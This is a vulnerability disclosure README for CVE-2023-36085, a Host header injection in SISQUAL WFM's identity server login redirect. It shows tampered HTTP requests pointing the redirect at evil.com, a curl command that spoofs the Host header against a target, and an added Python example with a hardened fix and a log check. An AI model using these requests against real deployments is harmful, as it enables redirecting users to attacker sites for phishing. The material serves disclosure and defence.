
CVE-2023-36085 PoC — SISQUAL WFM Input Validation Error Vulnerability

Associated Vulnerability
Title: SISQUAL WFM Input Validation Error Vulnerability (CVE-2023-36085)
Description: SISQUAL WFM is an intelligent software solution from SISQUAL WFM that enables companies around the world to forecast, plan and manage their workforce. SISQUAL WFM versions 7.1.319.103 through 7.1.319.111 contain a security vulnerability stemming from a Host header injection flaw: by modifying the HTTP Host header, an attacker can alter web page links or even redirect users to an arbitrary or malicious location.
Description
This repository contains information related to CVE-2023-36085, a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.
Readme
# CVE-2023-36085 SISQUALWFM Host Header Injection Vulnerability

This repository contains information related to a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.

## Vulnerability Details

- **Exploit Title:** SISQUALWFM 7.1.319.103 Host Header Injection
- **Discovered Date:** 17/03/2023
- **Reported Date:** 17/03/2023
- **Resolved Date:** 13/10/2023
- **Exploit Author:** Omer Shaik (unknown_exploit)
- **Vendor Homepage:** [SISQUALWFM](https://www.sisqualwfm.com)
- **Version:** 7.1.319.103
- **Tested on:** SISQUAL WFM 7.1.319.103
- **Affected Version:** SISQUALWFM 7.1.319.103
- **Fixed Version:** SISQUALWFM 7.1.319.111
- **CVE:** CVE-2023-36085
- **CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- **Category:** Web Apps

## Proof of Concept

We provide a proof-of-concept scenario demonstrating the host header injection vulnerability, specifically targeting the `/sisqualIdentityServer/core` endpoint. The application builds the `Location` header of its 302 response from the value of the incoming `Host` header, so an attacker who tampers with the host header can manipulate webpage links or redirect users to another site.

### Original Request

```http
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
```

### Original Response

```http
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
```

### Intercepted Request (Modified to Redirect to evil.com)

```http
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
```

### Response

```http
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...
```

![Exploit Execution](https://github.com/omershaik0/Handmade_Exploits/blob/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085/redirect.png)

## Method of Attack

To exploit this vulnerability, an attacker can use the following `curl` command to modify the host header:

```bash
# <target-domain> is a placeholder for the scheme and hostname of the SISQUAL WFM instance
curl -k -vvv --header "Host: attack.host.com" "https://<target-domain>/sisqualIdentityServer/core"
```
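The following is an added example, not code from the original repository or from the vendor. It models the behaviour shown in the proof of concept above (a redirect URL assembled from the client-supplied `Host` header) next to the usual fix (building the redirect only from an allow-listed hostname), and adds a small log check that flags 3xx responses whose `Location` reflects an unexpected `Host`. The function names, the `ALLOWED_HOSTS` set, the `SAMPLE_LOG` lines and their `host=... status=... location=...` format are all constructed for this example; only the hostname `sisqualwfm.cloud` and the `/sisqualIdentityServer/core/` path come from the advisory.

```python
import re
from urllib.parse import urlsplit

# Constructed assumptions for this example: the hostname the service is
# deployed on (from the advisory) and the hosts it is allowed to answer on.
CANONICAL_HOST = "sisqualwfm.cloud"
ALLOWED_HOSTS = {"sisqualwfm.cloud"}
REDIRECT_PATH = "/sisqualIdentityServer/core/"


def host_from_header(host_header: str) -> str:
    """Normalise a raw Host header value to a lowercase hostname.
    urlsplit strips the port, handles IPv6 brackets and lowercases."""
    return urlsplit("//" + host_header.strip()).hostname or ""


def vulnerable_redirect(host_header: str) -> str:
    """Models the behaviour in the advisory: the Location URL is built
    from whatever Host the client sent, so a spoofed header lands in it."""
    return f"https://{host_header}{REDIRECT_PATH}"


def hardened_redirect(host_header: str) -> str:
    """Builds the Location URL only from an allow-listed host; anything
    else falls back to the canonical hostname, so the Host header can no
    longer steer where the browser is sent."""
    host = host_from_header(host_header)
    if host not in ALLOWED_HOSTS:
        host = CANONICAL_HOST
    return f"https://{host}{REDIRECT_PATH}"


def location_reflects_host(host_header: str, location: str) -> bool:
    """True when the redirect target's host equals the request's Host
    value and that value is not one we serve, i.e. the header was reflected."""
    requested = host_from_header(host_header)
    target = urlsplit(location).hostname or ""
    return bool(requested) and target == requested and requested not in ALLOWED_HOSTS


# Constructed sample access-log lines (not real traffic): one legitimate
# redirect, one where a spoofed Host was reflected into Location, one 200.
SAMPLE_LOG = """\
2023-03-17T10:00:01Z host=sisqualwfm.cloud status=302 location=https://sisqualwfm.cloud/sisqualIdentityServer/core/
2023-03-17T10:00:02Z host=evil.com status=302 location=https://evil.com/sisqualIdentityServer/core/
2023-03-17T10:00:03Z host=sisqualwfm.cloud status=200 location=-
"""
LOG_RE = re.compile(r"host=(\S+) status=(\d+) location=(\S+)")


def find_reflected_redirects(log_text: str) -> list:
    """Scan log lines for 3xx responses whose Location reflects an
    unexpected Host header; returns the offending lines."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        host, status, location = m.groups()
        if status.startswith("3") and location_reflects_host(host, location):
            hits.append(line)
    return hits


if __name__ == "__main__":
    print("vulnerable:", vulnerable_redirect("evil.com"))
    print("hardened:  ", hardened_redirect("evil.com"))
    for hit in find_reflected_redirects(SAMPLE_LOG):
        print("reflected Host ->", hit)
```

The important design choice in `hardened_redirect` is that the output URL is rebuilt from the parsed, allow-listed hostname rather than from the raw header, so port suffixes, case differences or userinfo tricks in the `Host` value never reach the `Location` header. The same allow-list is reused by `location_reflects_host`, which makes the detection side consistent with the server-side rule.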

## Disclaimer

This repository is for informational purposes only and should not be used for any malicious activities. The vulnerability has been responsibly disclosed to the vendor, and the issue has been resolved. It is crucial to follow ethical hacking guidelines and respect responsible disclosure practices when identifying and reporting vulnerabilities.
File Snapshot

[4.0K] /data/pocs/f4047f52d13cac0f18d91a595dc7c3f84c7f030e
└── [2.6K] README.md

0 directories, 1 file